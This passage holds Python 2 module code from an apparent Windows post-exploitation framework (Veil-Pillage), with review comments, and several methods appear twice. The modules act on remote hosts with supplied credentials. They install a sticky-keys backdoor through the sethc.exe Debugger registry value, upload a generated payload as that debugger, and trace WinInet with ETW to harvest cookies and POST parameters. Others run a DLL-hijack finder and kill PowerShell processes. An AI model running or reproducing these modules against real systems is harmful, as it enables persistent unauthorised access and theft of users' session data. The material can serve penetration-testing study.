    by the framework's cleanup step.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # disable RDP command
        rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"

        # execute the RDP disable command and get the result
        rdpResult = command_methods.executeResult(target, username, password, rdpCMD,triggerMethod)

        if rdpResult == "":
            self.output += "[!] No result file, RDP disable failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The operation completed successfully" in rdpResult:
            self.output += "[*] RDP successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Enable UAC on each target by setting EnableLUA to 1.

    Runs `reg ADD ...\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f`.
    An empty result is recorded as "No result file",
    "The operation completed successfully" as success, and anything else as
    an error. Only the first credential pair is used.

    NOTE(review): no cleanup entry is queued for this change.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # reg.exe command to enable UAC
        command = "reg ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 1 /f"
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result == "":
            self.output += "[!] No result file, UAC enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The operation completed successfully" in result:
            self.output += "[*] UAC successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            self.output += "[!] Error in enabling UAC using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Check that PowerShell actually runs on each target by evaluating a trivial expression.

    Runs `powershell.exe -c "$a=42;$a"` and treats a stripped result of
    exactly "42" as functional; anything else, including an empty result, is
    recorded as not functional.

    NOTE(review): this tests execution rather than the Install registry value,
    so an installed PowerShell that is prevented from running presumably
    reads as "not functional"; the message does not distinguish the cases.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
        # but we don't actually care usually if it's installed, just if it's functionality
        # so let's just invoke it yo'
        command = "powershell.exe -c \"$a=42;$a\""
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result.strip() == "42":
            self.output += "[*] Powershell detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            self.output += "[!] Powershell not detected as functional using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Remove the sethc.exe Image File Execution Options Debugger value on each target.

    Runs `REG DELETE "...\\Image File Execution Options\\sethc.exe" /v Debugger /f`,
    undoing the sticky-keys debugger backdoor. An empty result is recorded as
    "No result file" and "The operation completed successfully" as success.

    NOTE(review): there is no else branch, so any other output (for example
    reg.exe reporting that the value does not exist) leaves nothing in
    self.output for that target.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # the registry command to disable the sethc stickkeys backdoor
        disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"

        # execute the sethc command and get the result
        disableResult = command_methods.executeResult(target, username, password, disableSethcCommand, triggerMethod)

        if disableResult == "":
            self.output += "[!] No result file, SETHC backdoor disable failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The operation completed successfully" in disableResult:
            self.output += "[*] SETHC backdoor successfully disabled using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Collect and parse .lnk files from the recent-items folders on each target.

    Resolves %USERPROFILE% on the target with `echo`, then for four candidate
    Recent directories (Windows and Office, legacy and AppData layouts) lists
    the directory via smb.ls (path_error=False), downloads every entry ending
    in "lnk" with smb.getFile, saves it through helpers.saveModuleFile, and
    saves the pylnker.parse_lnk output alongside it as <file>_details.
    Progress and failures are appended to self.output.

    NOTE(review): the bare `except:` also swallows KeyboardInterrupt and
    SystemExit; catch Exception and include the error text in the message.
    NOTE(review): `file` shadows the builtin.
    NOTE(review): `user_profile` is remote command output joined straight into
    SMB paths; a multi-line or unexpected response produces odd paths rather
    than an error, which path_error=False then hides.
    NOTE(review): `file[-3:] == "lnk"` is case-sensitive and also matches
    names ending in "lnk" with no dot; `file.lower().endswith(".lnk")` is the
    usual check.
    NOTE(review): only the profile of the first credential pair's user is
    inspected.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    trigger_method = self.required_options["trigger_method"][0]

    for target in self.targets:
        # resolve the remote user's profile directory
        command = "echo %USERPROFILE%"
        user_profile = command_methods.executeResult(target, username, password, command, trigger_method)

        if user_profile == '':
            self.output += " [!] No result file querying env variables using creds " + username + ":" + password + " on: " + target + "\n"
        else:
            user_profile = user_profile.strip(" \r\n")

            # candidate recent-items locations under the profile
            recent_path1 = user_profile + "\\Recent"
            recent_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Windows\\Recent"
            office_path1 = user_profile + "\\Application Data\\Microsoft\\Office\\Recent"
            office_path2 = user_profile + "\\AppData\\Roaming\\Microsoft\\Office\\Recent"

            self.output += " [*] Enumerating recent files on %s \n" % target

            for path in [recent_path1, recent_path2, office_path1, office_path2]:
                # path_error=False: a missing directory is treated as empty
                files = smb.ls(target, username, password, path, path_error=False)

                if len(files) > 0:
                    self.output += " [*] Found %s files \n" % len(files)

                    for file in files:
                        if file[-3:] == "lnk":
                            out = smb.getFile(target, username, password, path + "\\" + file, delete=False)

                            if out == '':
                                self.output += " [!] Failed retrieving : %s \n" % file
                            else:
                                save_path = helpers.saveModuleFile(self, target, file, out)
                                self.output += " [*] .lnk file %s saved from %s to %s\n" % (file,path,save_path)

                                try:
                                    # parsed_lnk = str(pylnk.parse(save_path)).decode('cp1252')
                                    parsed_lnk = pylnker.parse_lnk(save_path)
                                    details_path = helpers.saveModuleFile(self, target, file + '_details', parsed_lnk)
                                    self.output += " [*] .lnk file %s parsed and saved to %s\n" % (save_path,details_path)
                                except:
                                    # NOTE(review): bare except hides the parse error type
                                    self.output += " [!] Error while parsing : %s \n" % save_path
def run(self):
    """Run `net group "<group>" /domain` on each target and append the raw listing.

    An empty result is recorded as "No result file"; otherwise the output is
    appended under a per-target header. triggerMethod is hard-coded to
    "winexe". Only the first credential pair is used.

    NOTE(review): both messages render the group as '<group>'' with a doubled
    closing quote; runtime string, left as-is here.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    group = self.required_options["group"][0]
    triggerMethod = "winexe"

    for target in self.targets:
        # net command to query the domain group
        command = "net group \"%s\" /domain" %( group )
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result == "":
            self.output += "[!] No result file, query for domain group '"+group+"'' failed using creds '"+username+":"+password+"' on " + target + "\n"
        else:
            self.output += "[*] Query for domain group '"+group+"'' sucessful using creds '"+username+":"+password+"' on " + target + ":\n"
            self.output += result + "\n"
def run(self):
    """Check that PowerShell actually runs on each target by evaluating a trivial expression.

    Runs `powershell.exe -c "$a=42;$a"` and treats a stripped result of
    exactly "42" as functional; anything else, including an empty result, is
    recorded as not functional.

    NOTE(review): this tests execution rather than the Install registry value,
    so an installed PowerShell that is prevented from running presumably
    reads as "not functional"; the message does not distinguish the cases.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # reg_command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
        # but we don't actually care usually if it's installed, just if it's functionality
        # so let's just invoke it yo'
        command = "powershell.exe -c \"$a=42;$a\""
        result = command_methods.executeResult(target, username, password, command, triggerMethod)

        if result.strip() == "42":
            self.output += "[*] Powershell detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            self.output += "[!] Powershell not detected as functional using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """Remove the sethc.exe Image File Execution Options Debugger value on each target.

    Runs `REG DELETE "...\\Image File Execution Options\\sethc.exe" /v Debugger /f`,
    undoing the sticky-keys debugger backdoor. An empty result is recorded as
    "No result file" and "The operation completed successfully" as success.

    NOTE(review): there is no else branch, so any other output (for example
    reg.exe reporting that the value does not exist) leaves nothing in
    self.output for that target.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # the registry command to disable the sethc stickkeys backdoor
        disableSethcCommand = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"

        # execute the sethc command and get the result
        disableResult = command_methods.executeResult( target, username, password, disableSethcCommand, triggerMethod)

        if disableResult == "":
            self.output += "[!] No result file, SETHC backdoor disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "The operation completed successfully" in disableResult:
            self.output += "[*] SETHC backdoor successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """Start an ETW trace of the Microsoft-Windows-WinInet provider on each target.

    Runs `logman start Status32 -p Microsoft-Windows-WinInet -o
    C:\\Windows\\Temp\\status32.etl -ets`. An empty result is recorded as
    "no result file", "The command completed successfully." as started, and
    anything else as a failure. Only the first credential pair is used.

    NOTE(review): nothing is queued in self.cleanup, so the trace session and
    the .etl file under C:\\Windows\\Temp presumably remain until the
    companion stop module is run against the same target.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # command to start Event Tracing for Windows on the target for WinInet (IE)
        cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"
        etwResult = command_methods.executeResult(target, username, password, cmd, triggerMethod)

        if etwResult == "":
            self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on : " + target + ", no result file\n"
        elif "The command completed successfully." in etwResult:
            self.output += "[*] ETW started using creds '"+username+":"+password+"' on "+target+"\n"
        else:
            self.output += "[!] ETW unsuccessfully started using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Disable Remote Desktop on each target by setting fDenyTSConnections to 1.

    Runs `reg add ...\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 1 /f`.
    An empty result is recorded as "No result file" and
    "The operation completed successfully" as success.

    NOTE(review): there is no else branch, so any other output (an access
    denied message, for instance) leaves nothing in self.output for that
    target; the UAC module records an error line in that case.
    NOTE(review): no cleanup entry is queued, so the change is not reverted
    by the framework's cleanup step.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    for target in self.targets:
        # disable RDP command
        rdpCMD = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"

        # execute the RDP disable command and get the result
        rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod)

        if rdpResult == "":
            self.output += "[!] No result file, RDP disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "The operation completed successfully" in rdpResult:
            self.output += "[*] RDP successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """Module template: run one placeholder command per target.

    The command string and the "something" result check are stand-ins to be
    replaced by a real module.  Reads the first credential pair from
    self.creds and the trigger method from required_options["trigger_method"]
    at call time.  Returns (self.output, self.cleanup) explicitly, unlike the
    other run() implementations in this file which leave the return implicit.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    for target in self.targets:
        # Python 2 print statement
        print " [*] Doing something on %s" %(target)
        command = "something to do on the host"
        # ...
        result = command_methods.executeResult(target, username, password, command, self.required_options["trigger_method"][0])
        # check our output and write output/cleanup as appropriate
        if "something" in result:
            self.output += "action successful on " + target + "\n"
            # this needs to be tab-separated, check a module for examples
            # (the other modules here actually use "|" as the field separator)
            self.cleanup += "cleanup command " + target + "\n"
    # finally return our output and cleanup text
    return (self.output, self.cleanup)
def run(self):
    """Run `net group "<group>" /domain` on each target and collect the output.

    Reads the first credential pair from self.creds and the group name from
    required_options["group"].  The trigger method is hard-coded to "winexe"
    rather than read from required_options.  On success the raw command
    output is appended to self.output verbatim.  Both status lines include
    the password in plaintext.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    group = self.required_options["group"][0]
    triggerMethod = "winexe"
    for target in self.targets:
        # net command to query the domain group
        # NOTE(review): `group` is interpolated inside a double-quoted
        # argument without escaping; a group name containing '"' would
        # break the quoting.
        command = "net group \"%s\" /domain" % (group)
        result = command_methods.executeResult(target, username, password, command, triggerMethod)
        if result == "":
            # the doubled apostrophe after the group name and the
            # "sucessful" spelling below are in the original message text
            self.output += "[!] No result file, query for domain group '" + group + "'' failed using creds '" + username + ":" + password + "' on " + target + "\n"
        else:
            self.output += "[*] Query for domain group '" + group + "'' sucessful using creds '" + username + ":" + password + "' on " + target + ":\n"
            self.output += result + "\n"
def run(self):
    """Report whether UAC (the EnableLUA policy value) is on or off per target.

    Read-only: the reg query does not change the value.  Reads the first
    credential pair from self.creds and the trigger method from
    required_options["trigger_method"]; appends one status line per target
    to self.output (password in plaintext).
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    for target in self.targets:
        # reg.exe query for the EnableLUA value (the original comment said
        # "disable UAC", but this command only reads the value)
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"
        result = command_methods.executeResult(target, username, password, command, triggerMethod)
        if result == "":
            self.output += "[!] No result file, check UAC failed using creds '"+username+":"+password+"' on : " + target + "\n"
        # substring checks on the reg.exe output: "0x1" is tested before
        # "0x0"; any other non-empty output lands in the else branch
        elif "0x1" in result:
            self.output += "[*] UAC enabled using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "0x0" in result:
            self.output += "[*] UAC disabled using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            self.output += "[!] Error in checking UAC using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Report whether UAC (the EnableLUA policy value) is on or off per target.

    Read-only: the reg query does not change the value.  Reads the first
    credential pair from self.creds and the trigger method from
    required_options["trigger_method"]; appends one status line per target
    to self.output (password in plaintext).
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    for target in self.targets:
        # reg.exe query for the EnableLUA value (the original comment said
        # "disable UAC", but this command only reads the value)
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA"
        result = command_methods.executeResult(target, username, password, command, triggerMethod)
        if result == "":
            self.output += "[!] No result file, check UAC failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        # substring checks on the reg.exe output: "0x1" is tested before
        # "0x0"; any other non-empty output lands in the else branch
        elif "0x1" in result:
            self.output += "[*] UAC enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "0x0" in result:
            self.output += "[*] UAC disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
        else:
            self.output += "[!] Error in checking UAC using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """Start a WinInet ETW trace named "Status32" on each target via logman.

    Reads the first credential pair from self.creds and the trigger method
    from required_options["trigger_method"].  Appends one status line per
    target to self.output (the password is included in plaintext).  No entry
    is added to self.cleanup, so stopping the trace and removing the .etl
    file under C:\\Windows\\Temp is left to a later step.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    for target in self.targets:
        # command to start Event Tracing for Windows on the target for the
        # Microsoft-Windows-WinInet provider
        cmd = "logman start Status32 -p Microsoft-Windows-WinInet -o C:\\Windows\\Temp\\status32.etl -ets"
        etwResult = command_methods.executeResult(target, username, password, cmd, triggerMethod)
        # empty result -> "no result file"; non-empty without the success
        # marker -> generic failure line
        if etwResult == "":
            self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on : " + target + ", no result file\n"
        elif "The command completed successfully." in etwResult:
            self.output += "[*] ETW started using creds '" + username + ":" + password + "' on " + target + "\n"
        else:
            self.output += "[!] ETW unsuccessfully started using creds '" + username + ":" + password + "' on : " + target + "\n"
def run(self):
    """Stop the "Status32" ETW trace, filter it for a marker, and save the hits.

    Reads the first credential pair from self.creds, the trigger method from
    required_options["trigger_method"], and required_options["flag"].  A
    flag of "post" (any case) searches for "POST" and saves to
    post_params.txt; any other value searches for "cookie added" and saves to
    cookies.txt.  The trace file C:\\Windows\\Temp\\status32.etl is deleted
    after parsing.  Appends one line per target to self.output (password in
    plaintext).  The parse step waits up to 20 s (pause=20).
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    flag = self.required_options["flag"][0]
    for target in self.targets:
        # stop the ETW
        stopCMD = "logman stop Status32 -ets"
        command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)
        # search for cookies or POST paramters
        # `flag` is overwritten with the literal search string; on later
        # targets "POST".lower() is still "post", so every target takes the
        # same branch as the first one
        if flag.lower() == "post":
            flag = "POST"
            moduleFile = "post_params.txt"
        else:
            flag = "cookie added"
            moduleFile = "cookies.txt"
        # check the ETW results for the specified flag, and delete the dump file
        parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
        # wait 20 seconds for everything to parse...if errors happen, increase this
        parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)
        # delete the trace file
        delCmd = "del C:\\Windows\\Temp\\status32.etl"
        command_methods.executeCommand(target, username, password, delCmd, triggerMethod)
        if parseResult == "":
            self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            # save the file off to the appropriate location
            saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
            self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
def run(self):
    """Upload finddllhijack.exe to each target, run it, and save its output.

    Reads the first credential pair from self.creds and the trigger method
    from required_options["trigger_method"].  The binary is read from
    settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe", pushed over
    SMB into C$\\Windows\\Temp\\, run with pause=5, and then removed with a
    `del` (no self.cleanup entry is recorded).  The output is always passed
    to helpers.saveModuleFile, even when empty; self.output gets one line per
    target.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    # command to invoke finddllhijack and output it to a temporary file
    exePath = settings.VEIL_PILLAGE_PATH + "/data/misc/finddllhijack.exe"
    cmd = "C:\\Windows\\Temp\\finddllhijack.exe"
    for target in self.targets:
        # upload the binary to the host at C:\Windows\Temp\
        smb.uploadFile(target, username, password, "C$", "\\Windows\\Temp\\", exePath)
        # execute finddllhijack and get the results
        out = command_methods.executeResult(target, username, password, cmd, triggerMethod, pause=5)
        # cleanup: remove the uploaded binary right away rather than via self.cleanup
        command_methods.executeCommand(target, username, password, "del C:\\Windows\\Temp\\finddllhijack.exe", triggerMethod)
        # save the file off to the appropriate location (written even if `out` is empty)
        saveFile = helpers.saveModuleFile(self, target, "finddllhijack.txt", out)
        if out != "":
            self.output += "[*] FindDllHijack results for " + target + " stored at " + saveFile + "\n"
        else:
            self.output += "[!] FindDllHijack failed for " + target + " : no result file\n"
def run(self):
    """Force-terminate every powershell.exe process on each target.

    Reads the first credential pair from self.creds and the trigger method
    from required_options["trigger_method"].  Appends one status line per
    target to self.output (password in plaintext).  Nothing is added to
    self.cleanup.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    # kill all powershell processes
    killCMD = "taskkill /f /im powershell.exe"
    for target in self.targets:
        # execute the command on the host and get the output
        out = command_methods.executeResult(target, username, password, killCMD, triggerMethod=triggerMethod)
        # no separate "no result file" case here: an empty `out` simply
        # fails the substring test and is reported as a failure
        if "SUCCESS" in out:
            self.output += "[*] Powershell processes terminated using creds '" + username + ":" + password + "' on " + target + "\n"
        else:
            self.output += "[*] Powershell processes failed to terminate using creds '" + username + ":" + password + "' on " + target + "\n"
def run(self):
    """Module template: run one placeholder command per target.

    The command string and the "something" result check are stand-ins to be
    replaced by a real module.  Reads the first credential pair from
    self.creds and the trigger method from required_options["trigger_method"]
    at call time.  Returns (self.output, self.cleanup) explicitly.
    """
    # assume single set of credentials for this module
    username, password = self.creds[0]
    for target in self.targets:
        # Python 2 print statement; "soemthing" is the original message text
        print " [*] Doing soemthing on %s" % (target)
        command = "something to do on the host"
        # ...
        result = command_methods.executeResult(target, username, password, command, self.required_options["trigger_method"][0])
        # check our output and write output/cleanup as appropriate
        if "something" in result:
            self.output += "action successful on " + target + "\n"
            # this needs to be tab-separated, check a module for examples
            # (the other modules here actually use "|" as the field separator)
            self.cleanup += "cleanup command " + target + "\n"
    # finally return our output and cleanup text
    return (self.output, self.cleanup)
def run(self):
    """Set the sethc.exe IFEO "Debugger" value to cmd.exe on each target.

    Reads the first credential pair from self.creds and the trigger method
    from required_options["trigger_method"].  On a reported success a
    cleanup entry that deletes the Debugger value again is appended to
    self.cleanup in the "executeCommand|target|user|pass|cmd|trigger" format.
    Status lines in self.output include the password in plaintext.  The
    Debugger value under Image File Execution Options is the only artifact
    this module writes.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    for target in self.targets:
        # the registry command to set up the sethc stickkeys backdoor
        sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""
        # execute the sethc command and get the result
        sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)
        if sethcResult == "":
            self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The operation completed successfully" in sethcResult:
            self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
            # build our cleanup -> deleting this registry run value
            cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
        # NOTE(review): no else branch — any other non-empty result leaves
        # no output line and no cleanup entry for this target.
def run(self):
    """Set the sethc.exe IFEO "Debugger" value to cmd.exe on each target.

    Reads the first credential pair from self.creds and the trigger method
    from required_options["trigger_method"].  On a reported success a
    cleanup entry that deletes the Debugger value again is appended to
    self.cleanup in the "executeCommand|target|user|pass|cmd|trigger" format.
    Status lines in self.output include the password in plaintext.  The
    Debugger value under Image File Execution Options is the only artifact
    this module writes.
    """
    # assume single set of credentials (take the first one)
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    for target in self.targets:
        # the registry command to set up the sethc stickkeys backdoor
        sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\System32\\cmd.exe\""
        # execute the sethc command and get the result
        sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)
        if sethcResult == "":
            self.output += "[!] No result file, SETHC backdoor enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "The operation completed successfully" in sethcResult:
            self.output += "[*] SETHC backdoor successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
            # build our cleanup -> deleting this registry run value
            cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cleanupCMD + "|" + triggerMethod + "\n"
        # NOTE(review): no else branch — any other non-empty result leaves
        # no output line and no cleanup entry for this target.
def run(self):
    """Report whether PowerShell is installed on each target.

    Read-only: queries HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install.
    Reads the first credential pair from self.creds and the trigger method
    from required_options["trigger_method"].  Appends one status line per
    target to self.output (password in plaintext).
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    for target in self.targets:
        # reg.exe command to detect if powershell is installed
        command = "reg query HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1 /v Install"
        result = command_methods.executeResult(target, username, password, command, triggerMethod)
        # the "error:" prefix check comes before the empty check, so an
        # error string from executeResult is reported with its text
        if result.startswith("error:"):
            self.output += "[!] Error '"+result+"' in detecting powershell using creds '"+username+":"+password+"' on : " + target + "\n"
        elif result == "":
            self.output += "[!] No result file, detect PowerShell failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "0x1" in result:
            self.output += "[*] PowerShell detected using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "0x0" in result:
            self.output += "[*] PowerShell not detected using creds '"+username+":"+password+"' on : " + target + "\n"
        else:
            # leftover debug print (Python 2 print statement) that goes to
            # stdout rather than self.output
            print "result:",result
            self.output += "[!] Error in detecting PowerShell using creds '"+username+":"+password+"' on : " + target + "\n"
def run(self):
    """Upload a chosen .exe to C:\\Windows\\ and point the sethc.exe IFEO
    "Debugger" value at it on each target.

    Reads the first credential pair from self.creds, and the
    "trigger_method", "upload_name" and "exe_path" required options.  When
    exe_path is "veil" the binary comes from an interactive or
    argument-driven Veil-Evasion run (self.args.p / .c / .msfpayload /
    .msfoptions); otherwise exe_path must be an existing local file.  Both
    error paths prompt with raw_input and `return ""`; the normal path
    returns None implicitly.

    Artifacts: the uploaded file C:\\Windows\\<uploadName> and the IFEO
    Debugger value.  Only the registry value is reversed by the self.cleanup
    entry; the uploaded binary is not removed by anything in this module.
    Status lines in self.output include the password in plaintext.
    """
    # assume single set of credentials
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]
    uploadName = self.required_options["upload_name"][0]
    # if we're using Veil-Evasion for payload generation
    if self.required_options["exe_path"][0].lower() == "veil":
        # create a Veil-Evasion controller object for payload generation
        con = controller.Controller()
        # check various possibly flags passed by the command line
        # if we don't have payload specified, jump to the main controller menu
        if not self.args.p:
            payloadPath = con.MainMenu()
        # otherwise, set all the appropriate payload options
        else:
            # pull out any required options from the command line and
            # build the proper dictionary so we can set the payload manually
            options = {}
            if self.args.c:
                options['required_options'] = {}
                for option in self.args.c:
                    # NOTE(review): split("=") with no maxsplit — a value
                    # containing "=" raises ValueError on unpacking
                    name,value = option.split("=")
                    options['required_options'][name] = [value, ""]
            # pull out any msfvenom shellcode specification and msfvenom options
            if self.args.msfpayload:
                options['msfvenom'] = [self.args.msfpayload, self.args.msfoptions]
            # manually set the payload in the controller object
            con.SetPayload(self.args.p, options)
            # generate the payload code
            code = con.GeneratePayload()
            # grab the generated payload .exe name
            payloadPath = con.OutputMenu(con.payload, code, showTitle=True, interactive=False)
        # nicely print the title and module name again (since Veil-Evasion trashes this)
        messages.title()
        print " [*] Executing module: " + helpers.color(self.name) + "..."
        # sanity check if the user exited Veil-Evasion execution
        if not payloadPath or payloadPath == "":
            print helpers.color(" [!] No output from Veil-Evasion", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""
    # if we have a custom-specified .exe, use that instead
    else:
        payloadPath = self.required_options["exe_path"][0]
        # if the .exe path doesn't exist, print and error and return
        if not os.path.exists(payloadPath):
            print helpers.color("\n\n [!] Invalid .exe path specified", warning=True)
            raw_input("\n [>] Press enter to continue: ")
            return ""
    # make sure the name ends with ".exe"
    if not uploadName.endswith(".exe"):
        uploadName += ".exe"
    # copy the resulting binary into the temporary directory with the appropriate name
    # NOTE(review): os.system builds a shell command by string concatenation,
    # so spaces or shell metacharacters in payloadPath/uploadName are
    # interpreted by the local shell; shutil.copy would avoid that.
    os.system("cp "+payloadPath+" /tmp/"+uploadName)
    for target in self.targets:
        # loop-invariant: only the last path component is used for messages
        baseName = payloadPath.split("/")[-1]
        # upload the payload to C:\Windows\ (the share path is "\Windows\",
        # not System32 as an earlier comment claimed)
        smb.uploadFile(target, username, password, "C$", "\\Windows\\","/tmp/"+uploadName)
        self.output += "[*] Binary '"+baseName+"' uploaded to C:\\Windows\\"+uploadName+" using creds '"+username+":"+password+"' on : " + target + "\n"
        # the registry command to set up the sethc stickkeys backdoor for the binary
        sethcCommand = "REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /f /v Debugger /t REG_SZ /d \"C:\\Windows\\"+uploadName+"\""
        # execute the sethc command and get the result
        sethcResult = command_methods.executeResult(target, username, password, sethcCommand, triggerMethod)
        if sethcResult == "":
            self.output += "[!] No result file, SETHC backdoor enable failed using creds '"+username+":"+password+"' on : " + target + "\n"
        elif "The operation completed successfully" in sethcResult:
            self.output += "[*] SETHC backdoor successfully enabled using creds '"+username+":"+password+"' on : " + target + "\n"
            # build our cleanup -> deleting this registry run value
            # (the uploaded binary itself is not covered by this cleanup)
            cleanupCMD = "REG DELETE \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /f"
            self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+cleanupCMD+"|"+triggerMethod+"\n"
def run(self):
    """Collect credential material from each target by one of two paths.

    Reads the first credential pair from self.creds and the "lhost",
    "use_ssl", "force_method", "delay" and "out_file" required options.
